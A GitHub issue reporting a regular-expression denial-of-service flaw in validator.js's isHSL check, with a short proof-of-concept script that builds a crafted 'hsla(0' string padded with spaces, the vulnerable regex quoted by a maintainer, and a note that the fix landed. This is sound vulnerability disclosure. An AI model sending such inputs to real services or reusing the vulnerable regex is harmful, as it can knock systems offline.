Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

ReDoS in isHSL #1598

Closed
yetingli opened this issue Feb 9, 2021 · 4 comments
Closed

ReDoS in isHSL #1598

yetingli opened this issue Feb 9, 2021 · 4 comments
Labels
🐛 bug 🔥 hot pr-raised

Comments

@yetingli
Copy link

yetingli commented Feb 9, 2021

Describe the bug
It allows cause a Regular Expression Denial of Service (REDoS) when checking if the crafted string is a hsl.

Examples

var validator = require("validator")
function build_attack(n) {
	var ret = "hsla(0"
	for (var i = 0; i < n; i++) {
		ret += " "
	}

	return ret+"◎";
}
for(var i = 1; i <= 50000; i++) {
    if (i % 1000 == 0) {
        var time = Date.now();
        var attack_str = build_attack(i)
       validator.isHSL(attack_str)
        var time_cost = Date.now() - time;
        console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
   }
}

Additional context
Validator.js version: 14.10.0
Node.js version:
OS platform: windows
@fedeci
Copy link
Contributor

fedeci commented Feb 12, 2021

This is the regex affected, the second one does not suffer of this problem

validator.js/src/lib/isHSL.js

Line 4 in 1b85829

const hslcomma = /^(hsl)a?\(\s*((\+|\-)?([0-9]+(\.[0-9]+)?(e(\+|\-)?[0-9]+)?|\.[0-9]+(e(\+|\-)?[0-9]+)?))(deg|grad|rad|turn|\s*)(\s*,\s*(\+|\-)?([0-9]+(\.[0-9]+)?(e(\+|\-)?[0-9]+)?|\.[0-9]+(e(\+|\-)?[0-9]+)?)%){2}\s*(,\s*((\+|\-)?([0-9]+(\.[0-9]+)?(e(\+|\-)?[0-9]+)?|\.[0-9]+(e(\+|\-)?[0-9]+)?)%?)\s*)?\)$/i;

@yetingli
Copy link
Author

This is the regex affected, the second one does not suffer of this problem

validator.js/src/lib/isHSL.js

Line 4 in 1b85829

const hslcomma = /^(hsl)a?\(\s*((\+|\-)?([0-9]+(\.[0-9]+)?(e(\+|\-)?[0-9]+)?|\.[0-9]+(e(\+|\-)?[0-9]+)?))(deg|grad|rad|turn|\s*)(\s*,\s*(\+|\-)?([0-9]+(\.[0-9]+)?(e(\+|\-)?[0-9]+)?|\.[0-9]+(e(\+|\-)?[0-9]+)?)%){2}\s*(,\s*((\+|\-)?([0-9]+(\.[0-9]+)?(e(\+|\-)?[0-9]+)?|\.[0-9]+(e(\+|\-)?[0-9]+)?)%?)\s*)?\)$/i;

You're right.

@profnandaa
Copy link
Member

Sorry for the late ACK, I should work on a fix for this, this weekend before our release. Thanks for raising!

@tux-tn tux-tn mentioned this issue Apr 19, 2021
Merged
1 task
profnandaa pushed a commit that referenced this issue Apr 20, 2021
@tux-tn
fix: ReDOS in isEmail and isHSL (#1651)
b986f3d 
* chore: bump mocha version to fix npm audit warning

* fix(isHSL): update hslComma regex to prevent ReDOS

* fix(isEmail): update splitNameAddress regex to prevent ReDOS

* chore: rollback mocha version to allow testing on node 8 and 6

* fix(isHSL): remove unnecessary use of let

closes #1597 #1598
@profnandaa
Copy link
Member

fixed in #1651

This was referenced Oct 28, 2021
Closed
Closed
Open
@github-actions github-actions bot mentioned this issue Nov 11, 2021
Closed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
🐛 bug 🔥 hot pr-raised
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
4 participants
@profnandaa @tux-tn @yetingli @fedeci